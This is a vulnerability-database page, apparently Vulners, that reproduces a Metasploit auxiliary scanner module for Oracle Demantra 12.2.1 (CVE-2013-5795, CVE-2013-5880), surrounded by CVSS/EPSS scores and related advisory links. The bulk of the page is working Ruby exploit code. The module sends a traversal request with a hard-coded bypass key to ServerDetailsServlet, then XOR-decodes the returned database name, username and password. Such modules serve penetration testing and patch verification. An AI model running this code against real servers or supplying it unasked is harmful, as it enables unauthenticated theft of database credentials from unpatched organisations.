Lucene search
Oliver GruskovnjakMSF:AUXILIARY-SCANNER-HTTP-ORACLE_DEMANTRA_DATABASE_CREDENTIALS_LEAK-HistoryApr 07, 2014 - 6:42 p.m.
Oracle Demantra Database Credentials Leak
2014-04-0718:42:47
Oliver Gruskovnjak
www.rapid7.com
3
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.884 High
EPSS
Percentile
98.7%
This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in combination with an authentication bypass. This way an unauthenticated user can retrieve the database name, username and password on any vulnerable machine.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Demantra Database Credentials Leak',
'Description' => %q{
This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in
combination with an authentication bypass. This way an unauthenticated user can retrieve
the database name, username and password on any vulnerable machine.
},
'References' =>
[
[ 'CVE', '2013-5795'],
[ 'CVE', '2013-5880'],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/'],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/' ]
],
'Author' =>
[
'Oliver Gruskovnjak'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-02-28'
))
register_options(
[
Opt::RPORT(8080),
OptBool.new('SSL', [false, 'Use SSL', false])
])
end
def run_host(ip)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('demantra', 'common', 'loginCheck.jsp', '..', '..', 'ServerDetailsServlet'),
'vars_get' => {
'UAK' => '406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1'
}
})
if res.nil? or res.body.empty?
vprint_error("No content retrieved")
return
end
if res.code == 404
vprint_error("File not found")
return
end
if res.code == 200
creds = ""
vprint_status("String received: #{res.body.to_s}") unless res.body.blank?
res.body.to_s.split(",").each do|c|
i = c.to_i ^ 0x50
creds += i.chr
end
print_good("Credentials decoded: #{creds}") unless creds.empty?
end
end
end
Related
cvelist
cvelist
CVE-2013-5880
2014-01-15 00:30:00
CVE-2013-5795
2014-01-15 00:30:00
prion
prion
Buffer overflow
2014-01-15 16:11:00
Buffer overflow
2014-01-15 16:11:00
Design/Logic Flaw
2014-03-27 18:55:00
cve
cve
packetstorm
packetstorm
Oracle Demantra 12.2.1 Authentication Bypass
2014-03-02 00:00:00
Oracle Demantra 12.2.1 Database Credential Leak
2014-03-02 00:00:00
nvd
nvd
zdt
zdt
Oracle Demantra 12.2.1 - Database Credentials Disclosure
2014-03-01 00:00:00
metasploit
metasploit
Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
2014-03-27 04:53:12
threatpost
threatpost
Four Oracle Demantra Security Vulnerabilities Found
2014-03-03 14:08:14
securityvulns
securityvulns
oracle
oracle
Oracle Critical Patch Update - January 2014
2014-01-14 00:00:00
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.884 High
EPSS
Percentile
98.7%
Related for MSF:AUXILIARY-SCANNER-HTTP-ORACLE_DEMANTRA_DATABASE_CREDENTIALS_LEAK-